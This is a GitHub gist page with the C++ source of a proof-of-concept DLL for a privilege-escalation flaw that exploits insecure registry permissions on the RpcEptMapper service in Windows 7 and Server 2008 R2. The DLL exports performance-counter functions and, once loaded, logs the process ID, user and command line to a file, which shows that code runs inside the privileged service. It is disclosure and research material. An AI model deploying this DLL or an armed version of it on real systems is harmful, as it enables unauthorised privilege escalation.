-
-
Save clavoillotte/e455ec875ca6179f7800be52fb3ed5b8 to your computer and use it in GitHub Desktop.
Windows 7-2008R2 RpcEptMapper Service Insecure Registry Permissions EoP - PoC DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <Windows.h> | |
| #include <Lmcons.h> // UNLEN + GetUserName | |
| #include <tlhelp32.h> // CreateToolhelp32Snapshot() | |
| #include <strsafe.h> | |
| extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); | |
| extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); | |
| void Log(LPCWSTR pwszCallingFrom); | |
| void LogToFile(LPCWSTR pwszFilnema, LPWSTR pwszData); | |
| DWORD APIENTRY OpenPerfData(LPWSTR pContext) | |
| { | |
| Log(L"OpenPerfData"); | |
| return ERROR_SUCCESS; | |
| } | |
| DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned) | |
| { | |
| Log(L"CollectPerfData"); | |
| return ERROR_SUCCESS; | |
| } | |
| DWORD APIENTRY ClosePerfData() | |
| { | |
| Log(L"ClosePerfData"); | |
| return ERROR_SUCCESS; | |
| } | |
| void Log(LPCWSTR pwszCallingFrom) | |
| { | |
| LPWSTR pwszBuffer, pwszCommandLine; | |
| WCHAR wszUsername[UNLEN + 1] = { 0 }; | |
| SYSTEMTIME st = { 0 }; | |
| HANDLE hToolhelpSnapshot; | |
| PROCESSENTRY32 stProcessEntry = { 0 }; | |
| DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0; | |
| BOOL bResult = FALSE; | |
| // Get the command line of the current process | |
| pwszCommandLine = GetCommandLine(); | |
| // Get the name of the process owner | |
| GetUserName(wszUsername, &dwPcbBuffer); | |
| // Get the PID of the current process | |
| dwProcessId = GetCurrentProcessId(); | |
| // Get the PID of the parent process | |
| hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
| stProcessEntry.dwSize = sizeof(PROCESSENTRY32); | |
| if (Process32First(hToolhelpSnapshot, &stProcessEntry)) { | |
| do { | |
| if (stProcessEntry.th32ProcessID == dwProcessId) { | |
| dwParentProcessId = stProcessEntry.th32ParentProcessID; | |
| break; | |
| } | |
| } while (Process32Next(hToolhelpSnapshot, &stProcessEntry)); | |
| } | |
| CloseHandle(hToolhelpSnapshot); | |
| // Get the current date and time | |
| GetLocalTime(&st); | |
| // Prepare the output string and log the result | |
| dwBufSize = 4096 * sizeof(WCHAR); | |
| pwszBuffer = (LPWSTR)malloc(dwBufSize); | |
| if (pwszBuffer) | |
| { | |
| StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n", | |
| st.wHour, | |
| st.wMinute, | |
| st.wSecond, | |
| dwProcessId, | |
| dwParentProcessId, | |
| wszUsername, | |
| pwszCommandLine, | |
| pwszCallingFrom | |
| ); | |
| LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer); | |
| free(pwszBuffer); | |
| } | |
| } | |
| void LogToFile(LPCWSTR pwszFilename, LPWSTR pwszData) | |
| { | |
| HANDLE hFile; | |
| DWORD dwBytesWritten; | |
| hFile= CreateFile(pwszFilename, FILE_APPEND_DATA, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); | |
| if (hFile != INVALID_HANDLE_VALUE) | |
| { | |
| WriteFile(hFile, pwszData, (DWORD)wcslen(pwszData) * sizeof(WCHAR), &dwBytesWritten, NULL); | |
| CloseHandle(hFile); | |
| } | |
| } | |
| extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved) | |
| { | |
| switch (reason) | |
| { | |
| case DLL_PROCESS_ATTACH: | |
| Log(L"DllMain"); | |
| break; | |
| case DLL_THREAD_ATTACH: | |
| break; | |
| case DLL_THREAD_DETACH: | |
| break; | |
| case DLL_PROCESS_DETACH: | |
| break; | |
| } | |
| return TRUE; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment